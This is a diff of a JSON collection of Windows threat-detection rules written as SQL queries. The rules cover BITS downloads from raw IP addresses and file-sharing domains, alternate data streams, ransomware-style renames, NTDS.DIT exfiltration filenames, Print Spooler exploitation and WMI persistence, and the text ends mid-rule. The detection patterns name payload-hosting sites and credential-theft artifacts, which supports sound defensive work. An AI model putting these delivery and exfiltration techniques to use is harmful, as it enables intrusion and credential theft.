"tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "Hidden Executable In NTFS Alternate Data Stream", - "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "status": "test", - "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", - "author": "Florian Roth (Nextron Systems), @0xrawsec", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_ads_executable.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Unusual File Download From File Sharing Websites", - "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "title": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", + "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT (((RemoteName LIKE '%.azureedge.net/%' ESCAPE '\\' OR RemoteName LIKE '%.com/%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms/%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org/%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" + "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "title": "File Was Not Allowed To Run", + "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", + "author": "Pushkarev Dmitry", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Need tuning applocker or add exceptions in SIEM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_applocker_file_was_not_allowed_to_run.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Suspicious Appended Extension", - "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "status": "experimental", - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "author": "frack113", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "status": "test", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Backup software" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_rename_win_ransomware.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Rename Common File to DLL File", - "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", - "author": "frack113", - "falsepositives": [ - "Application installation" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" - ], - "filename": "file_rename_win_not_dll_to_dll.yml" - }, - { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "SCR File Write Event", - "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "The installation of new screen savers by third party software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_new_src_file.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "Advanced IP Scanner - File Event", - "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", - "status": "test", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "@ROxPinTeddy", + "title": "OpenSSH Server Listening On Socket", + "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "status": "experimental", + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "author": "mdecrevoisier", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.004" ], "falsepositives": [ - "Legitimate administrative use" + "Legitimate administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" ], - "filename": "file_event_win_advanced_ip_scanner.yml" + "filename": "win_sshd_openssh_server_listening_on_socket.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1068" + "attack.t1546.003" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown (data set is too small; further testing needed)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_wmi_persistence.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "status": "test", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image 